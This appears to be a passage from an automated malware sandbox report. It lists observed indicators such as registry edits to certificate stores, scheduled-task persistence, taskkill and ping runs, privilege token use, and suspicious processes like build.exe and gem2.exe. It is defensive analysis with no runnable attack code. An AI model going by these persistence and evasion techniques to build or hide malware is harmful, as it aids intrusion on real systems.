\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe -
Kills process with taskkill 2 IoCs
pid Process 4160 taskkill.exe 5156 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\5\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1226833921" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "72" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 200000001a00eebbfe23000010003accbfb42cdb4c42b0297fe99a87c64100000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\5 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "3" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "646" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 123.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 030000000400000005000000010000000200000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000d39ce8bc065db01adc1d0c3c965db019e9c9f0be465db0114000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 5708 PING.EXE 5156 PING.EXE 4028 PING.EXE 1936 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1920 schtasks.exe 3276 SCHTASKS.exe 1164 schtasks.exe 1604 schtasks.exe 2708 schtasks.exe 5724 schtasks.exe 4500 schtasks.exe 3732 schtasks.exe 1340 schtasks.exe 3560 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3648 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1172 chrome.exe 1172 chrome.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 476 build.exe 1952 gem1.exe 1952 gem1.exe 4944 gem2.exe 452 powershell.exe 452 powershell.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4944 gem2.exe 4884 dialer.exe 4884 dialer.exe 4884 dialer.exe 4884 dialer.exe 4884 dialer.exe 4884 dialer.exe 4884 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 3416 chrome.exe 3648 Explorer.EXE 2364 taskhostw.exe 2648 chrome.exe 5860 sela.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 2868 Process not Found 2892 Process not Found 1708 Process not Found 3028 Process not Found 1400 Process not Found 3748 Process not Found 1364 Process not Found 4284 Process not Found 4424 Process not Found 5780 Process not Found 4492 Process not Found 2976 Process not Found 2708 Process not Found 3556 Process not Found 2320 Process not Found 2852 Process not Found 568 Process not Found 2968 Process not Found 5824 Process not Found 4272 Process not Found 3920 Process not Found 4880 Process not Found 712 Process not Found 4248 Process not Found 1112 Process not Found 3708 Process not Found 5620 Process not Found 5664 Process not Found 2268 Process not Found 4732 Process not Found 3448 Process not Found 392 Process not Found 5336 Process not Found 436 Process not Found 3084 Process not Found 1256 Process not Found 5624 Process not Found 5048 Process not Found 1216 Process not Found 5992 Process not Found 3524 Process not Found 4524 Process not Found 3088 Process not Found 396 Process not Found 5196 Process not Found 752 Process not Found 3184 Process not Found 4960 Process not Found 3260 Process not Found 5168 Process not Found 764 Process not Found 3864 Process not Found 5960 Process not Found 4196 Process not Found 4036 Process not Found 3716 Process not Found 3304 Process not Found 5900 Process not Found 6096 Process not Found 4348 Process not Found 5532 Process not Found 228 Process not Found 1520 Process not Found 2780 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4112 chrome.exe 4112 chrome.exe 4112 chrome.exe 4112 chrome.exe 4112 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3732 7zFM.exe Token: 35 3732 7zFM.exe Token: SeSecurityPrivilege 3732 7zFM.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 